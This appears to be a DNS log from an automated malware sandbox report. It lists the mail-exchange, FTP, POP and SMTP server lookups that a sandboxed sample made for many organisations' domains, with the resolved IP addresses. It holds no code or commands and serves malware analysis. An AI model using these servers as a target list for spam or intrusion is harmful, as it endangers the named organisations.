                                                                                                                                                                                                    Nov 26, 2023 07:00:05.262326002 CET192.168.2.41.1.1.10x976Standard query (0)ftp.srmist.edu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.263623953 CET192.168.2.41.1.1.10xb585Standard query (0)ftp.saudi-jamac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.264256001 CET192.168.2.41.1.1.10x378eStandard query (0)ftp.dstaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.283935070 CET192.168.2.41.1.1.10xb2eeStandard query (0)mailgate.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.309305906 CET192.168.2.41.1.1.10xa5bbStandard query (0)macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.309812069 CET192.168.2.41.1.1.10xb203Standard query (0)ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.312797070 CET192.168.2.41.1.1.10xaaaeStandard query (0)mail.robinsonland.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.338526964 CET192.168.2.41.1.1.10xb540Standard query (0)ftp.2brosandahosepressurewashing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.533988953 CET192.168.2.41.1.1.10x32a4Standard query (0)mail.ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.541770935 CET192.168.2.41.1.1.10xc20cStandard query (0)mail.macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.583609104 CET192.168.2.41.1.1.10x95b0Standard query (0)ftp.greenrworld.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.586191893 CET192.168.2.41.1.1.10x6f9cStandard query (0)ftp.rdelealtad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.617122889 CET192.168.2.41.1.1.10x51b3Standard query (0)relay.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.652465105 CET192.168.2.41.1.1.10xc50cStandard query (0)ftp.killicit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.667994976 CET192.168.2.41.1.1.10x7d7bStandard query (0)ftp.linkan-group.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.841443062 CET192.168.2.41.1.1.10x6b9eStandard query (0)pop.edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:05.971635103 CET192.168.2.41.1.1.10xb2d8Standard query (0)pop.ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.028290987 CET192.168.2.41.1.1.10x7289Standard query (0)cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.183419943 CET192.168.2.41.1.1.10xb368Standard query (0)pop3.ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.337480068 CET192.168.2.41.1.1.10xe3d6Standard query (0)pop3.edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.337481022 CET192.168.2.41.1.1.10x28a5Standard query (0)ftp.hightideinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.362585068 CET192.168.2.41.1.1.10x8060Standard query (0)mail.townshipnjr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.363017082 CET192.168.2.41.1.1.10x31baStandard query (0)smtp.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.373383045 CET192.168.2.41.1.1.10x920fStandard query (0)d405642.b.ess.ca.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.421798944 CET192.168.2.41.1.1.10xd3e4Standard query (0)mailgate.ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.432660103 CET192.168.2.41.1.1.10xb96aStandard query (0)mx2.improvmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.572964907 CET192.168.2.41.1.1.10x4090Standard query (0)mail.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.573117018 CET192.168.2.41.1.1.10xf067Standard query (0)mailgate.edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.653208017 CET192.168.2.41.1.1.10xbfe0Standard query (0)relay.ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.818324089 CET192.168.2.41.1.1.10x57c8Standard query (0)ftp.townshipnjr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:06.928623915 CET192.168.2.41.1.1.10x4475Standard query (0)relay.edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.173000097 CET192.168.2.41.1.1.10x75f7Standard query (0)pop.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.516165972 CET192.168.2.41.1.1.10x4d2bStandard query (0)ftp.daisyokogyo.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.519603968 CET192.168.2.41.1.1.10x7535Standard query (0)ftp.americanrecords.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.520194054 CET192.168.2.41.1.1.10xb980Standard query (0)ftp.talentius.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.860097885 CET192.168.2.41.1.1.10xbef0Standard query (0)mail.grg17geblergasse.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.886224985 CET192.168.2.41.1.1.10xd94aStandard query (0)ftp.digdig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.902002096 CET192.168.2.41.1.1.10x8e55Standard query (0)mail.maxiv.lu.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:07.911231995 CET192.168.2.41.1.1.10x3841Standard query (0)pop3.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.001554012 CET192.168.2.41.1.1.10x4f8aStandard query (0)ftp.esistem.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.028270006 CET192.168.2.41.1.1.10x3768Standard query (0)jamiesonmullin-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.051305056 CET192.168.2.41.1.1.10x1607Standard query (0)ibright-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.294974089 CET192.168.2.41.1.1.10x387Standard query (0)mailgate.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 07:00:08.993154049 CET192.168.2.41.1.1.10x4f8aStandard query (0)ftp.esistem.com.brA (IP address)IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.132769108 CET1.1.1.1192.168.2.40x9ccaName error (3)lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.135812044 CET1.1.1.1192.168.2.40x90fdNo error (0)greenrworld.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.135812044 CET1.1.1.1192.168.2.40x90fdNo error (0)greenrworld.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.151576042 CET1.1.1.1192.168.2.40x250fNo error (0)townshipnjr.com66.81.203.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.151576042 CET1.1.1.1192.168.2.40x250fNo error (0)townshipnjr.com66.81.203.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.151576042 CET1.1.1.1192.168.2.40x250fNo error (0)townshipnjr.com66.81.203.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.160336971 CET1.1.1.1192.168.2.40xd978No error (0)knu.ac.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.160336971 CET1.1.1.1192.168.2.40xd978No error (0)knu.ac.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.160336971 CET1.1.1.1192.168.2.40xd978No error (0)knu.ac.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.173345089 CET1.1.1.1192.168.2.40x2c79No error (0)gasp-ga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.180028915 CET1.1.1.1192.168.2.40x42c7No error (0)krkconcord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.188131094 CET1.1.1.1192.168.2.40xa7c8No error (0)krkconcord.com35.237.190.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.189119101 CET1.1.1.1192.168.2.40x38e0No error (0)t1eng.com3.234.162.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.190936089 CET1.1.1.1192.168.2.40x1cf6No error (0)octetpowers.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.191093922 CET1.1.1.1192.168.2.40x151aNo error (0)t1eng.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.191093922 CET1.1.1.1192.168.2.40x151aNo error (0)t1eng.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.191767931 CET1.1.1.1192.168.2.40x4c8fNo error (0)bvhrs.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.192207098 CET1.1.1.1192.168.2.40x263bName error (3)carelesscommunity.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.193650961 CET1.1.1.1192.168.2.40x3c81No error (0)rdelealtad.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.193650961 CET1.1.1.1192.168.2.40x3c81No error (0)rdelealtad.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.197082043 CET1.1.1.1192.168.2.40xb9d9No error (0)aoiit.storeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.197904110 CET1.1.1.1192.168.2.40x8dd0No error (0)knu.ac.in3.111.240.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.201334953 CET1.1.1.1192.168.2.40xcd1bNo error (0)avient.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.203109026 CET1.1.1.1192.168.2.40xaf49Name error (3)sofia-communications.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.207535028 CET1.1.1.1192.168.2.40x8c4bName error (3)sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.209554911 CET1.1.1.1192.168.2.40x615cName error (3)lgs-strategies.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.218050003 CET1.1.1.1192.168.2.40xee12No error (0)gruporegiosafety.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.218050003 CET1.1.1.1192.168.2.40xee12No error (0)gruporegiosafety.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.219132900 CET1.1.1.1192.168.2.40xff82Name error (3)yahoo.comfreezednonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.219801903 CET1.1.1.1192.168.2.40x1eb4No error (0)jamiesonmullin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.230540991 CET1.1.1.1192.168.2.40xbca9No error (0)linkan-group.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.230540991 CET1.1.1.1192.168.2.40xbca9No error (0)linkan-group.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.230540991 CET1.1.1.1192.168.2.40xbca9No error (0)linkan-group.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.230540991 CET1.1.1.1192.168.2.40xbca9No error (0)linkan-group.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.230540991 CET1.1.1.1192.168.2.40xbca9No error (0)linkan-group.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.241441965 CET1.1.1.1192.168.2.40xc10fNo error (0)jamiesonmullin.com159.203.32.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.241487026 CET1.1.1.1192.168.2.40xc3a4No error (0)killicit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.241487026 CET1.1.1.1192.168.2.40xc3a4No error (0)killicit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.241487026 CET1.1.1.1192.168.2.40xc3a4No error (0)killicit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.241487026 CET1.1.1.1192.168.2.40xc3a4No error (0)killicit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.241487026 CET1.1.1.1192.168.2.40xc3a4No error (0)killicit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.246388912 CET1.1.1.1192.168.2.40xd837Name error (3)2l7g4s.usnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.251625061 CET1.1.1.1192.168.2.40xc83aNo error (0)hightideinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.251625061 CET1.1.1.1192.168.2.40xc83aNo error (0)hightideinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252233982 CET1.1.1.1192.168.2.40x261eNo error (0)cringemonster.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252233982 CET1.1.1.1192.168.2.40x261eNo error (0)cringemonster.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252233982 CET1.1.1.1192.168.2.40x261eNo error (0)cringemonster.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252955914 CET1.1.1.1192.168.2.40x5f89No error (0)midcapfunding.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252955914 CET1.1.1.1192.168.2.40x5f89No error (0)midcapfunding.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252955914 CET1.1.1.1192.168.2.40x5f89No error (0)midcapfunding.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252955914 CET1.1.1.1192.168.2.40x5f89No error (0)midcapfunding.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.252955914 CET1.1.1.1192.168.2.40x5f89No error (0)midcapfunding.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.253123045 CET1.1.1.1192.168.2.40x5583Name error (3)paintd.plus.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.256552935 CET1.1.1.1192.168.2.40x7567No error (0)dstaq.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.256552935 CET1.1.1.1192.168.2.40x7567No error (0)dstaq.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.256552935 CET1.1.1.1192.168.2.40x7567No error (0)dstaq.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.261305094 CET1.1.1.1192.168.2.40x466fNo error (0)rdelealtad.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.261305094 CET1.1.1.1192.168.2.40x466fNo error (0)rdelealtad.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262482882 CET1.1.1.1192.168.2.40xcfb8No error (0)mdystudent.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262482882 CET1.1.1.1192.168.2.40xcfb8No error (0)mdystudent.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262482882 CET1.1.1.1192.168.2.40xcfb8No error (0)mdystudent.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262482882 CET1.1.1.1192.168.2.40xcfb8No error (0)mdystudent.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262482882 CET1.1.1.1192.168.2.40xcfb8No error (0)mdystudent.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.262500048 CET1.1.1.1192.168.2.40x955eName error (3)xtsagency.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.263551950 CET1.1.1.1192.168.2.40x9371No error (0)integraledu.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.269547939 CET1.1.1.1192.168.2.40xcf16No error (0)wasserman.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.269547939 CET1.1.1.1192.168.2.40xcf16No error (0)wasserman.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.271991014 CET1.1.1.1192.168.2.40x7c50No error (0)nohonetworks.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.274266005 CET1.1.1.1192.168.2.40x9771No error (0)pixiil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.293523073 CET1.1.1.1192.168.2.40x554aNo error (0)rochester-gauges.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.300201893 CET1.1.1.1192.168.2.40x1721No error (0)directlendersllc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.300374985 CET1.1.1.1192.168.2.40xbb2dNo error (0)directlendersllc.com162.250.126.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.305114985 CET1.1.1.1192.168.2.40x1546No error (0)himontessori.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.325609922 CET1.1.1.1192.168.2.40xf157No error (0)hmichaelandco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.325609922 CET1.1.1.1192.168.2.40xf157No error (0)hmichaelandco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.325609922 CET1.1.1.1192.168.2.40xf157No error (0)hmichaelandco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.325609922 CET1.1.1.1192.168.2.40xf157No error (0)hmichaelandco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.325609922 CET1.1.1.1192.168.2.40xf157No error (0)hmichaelandco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.337199926 CET1.1.1.1192.168.2.40x41f0No error (0)killicit.com44.219.53.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.337199926 CET1.1.1.1192.168.2.40x41f0No error (0)killicit.com54.84.236.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.348334074 CET1.1.1.1192.168.2.40x8f7dNo error (0)mdystudent.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.348334074 CET1.1.1.1192.168.2.40x8f7dNo error (0)mdystudent.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.354979038 CET1.1.1.1192.168.2.40x1907No error (0)octetpowers.in148.66.138.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.355241060 CET1.1.1.1192.168.2.40x52a6No error (0)esoft.academyMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.358820915 CET1.1.1.1192.168.2.40xb8c6No error (0)avient.com23.185.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.359205961 CET1.1.1.1192.168.2.40x7bc1No error (0)gethsemane.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.359767914 CET1.1.1.1192.168.2.40x35faNo error (0)eco-landeck.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.361143112 CET1.1.1.1192.168.2.40x383eNo error (0)lumaruniformes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.361742973 CET1.1.1.1192.168.2.40xf2aeNo error (0)edgewater.groupMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.364245892 CET1.1.1.1192.168.2.40xc043No error (0)bvhrs.com68.168.209.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.366425991 CET1.1.1.1192.168.2.40xd87dNo error (0)hmichaelandco.com139.162.169.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.366866112 CET1.1.1.1192.168.2.40x305dNo error (0)eco-landeck.at116.202.203.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.369947910 CET1.1.1.1192.168.2.40x7f19No error (0)gethsemane.org75.118.8.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.377249956 CET1.1.1.1192.168.2.40x1806No error (0)ondania.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.389537096 CET1.1.1.1192.168.2.40xfc8bName error (3)lwindowelive.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.397142887 CET1.1.1.1192.168.2.40xf937No error (0)tradeavenida.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.400965929 CET1.1.1.1192.168.2.40xcc41Name error (3)carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.406816959 CET1.1.1.1192.168.2.40x23afName error (3)yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.408162117 CET1.1.1.1192.168.2.40x8704No error (0)micro-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.408162117 CET1.1.1.1192.168.2.40x8704No error (0)micro-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.408162117 CET1.1.1.1192.168.2.40x8704No error (0)micro-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.408162117 CET1.1.1.1192.168.2.40x8704No error (0)micro-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.408162117 CET1.1.1.1192.168.2.40x8704No error (0)micro-design.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.411640882 CET1.1.1.1192.168.2.40x89d4No error (0)gatewaytoearlylearning.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.411640882 CET1.1.1.1192.168.2.40x89d4No error (0)gatewaytoearlylearning.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.411640882 CET1.1.1.1192.168.2.40x89d4No error (0)gatewaytoearlylearning.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.411640882 CET1.1.1.1192.168.2.40x89d4No error (0)gatewaytoearlylearning.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.411640882 CET1.1.1.1192.168.2.40x89d4No error (0)gatewaytoearlylearning.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.412672997 CET1.1.1.1192.168.2.40x5a19No error (0)gmailvz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.422646046 CET1.1.1.1192.168.2.40x3ee7No error (0)wasserman.us216.250.121.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.428901911 CET1.1.1.1192.168.2.40xf88bNo error (0)micro-design.com34.208.26.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434497118 CET1.1.1.1192.168.2.40x3e99No error (0)students.kasralainy.edu.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434497118 CET1.1.1.1192.168.2.40x3e99No error (0)students.kasralainy.edu.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434497118 CET1.1.1.1192.168.2.40x3e99No error (0)students.kasralainy.edu.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434497118 CET1.1.1.1192.168.2.40x3e99No error (0)students.kasralainy.edu.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434497118 CET1.1.1.1192.168.2.40x3e99No error (0)students.kasralainy.edu.egMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434546947 CET1.1.1.1192.168.2.40xa17No error (0)ibright.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434925079 CET1.1.1.1192.168.2.40x28a3No error (0)schor.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434925079 CET1.1.1.1192.168.2.40x28a3No error (0)schor.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434925079 CET1.1.1.1192.168.2.40x28a3No error (0)schor.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434925079 CET1.1.1.1192.168.2.40x28a3No error (0)schor.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.434925079 CET1.1.1.1192.168.2.40x28a3No error (0)schor.beMX (Mail exchange)IN (0x0001)false
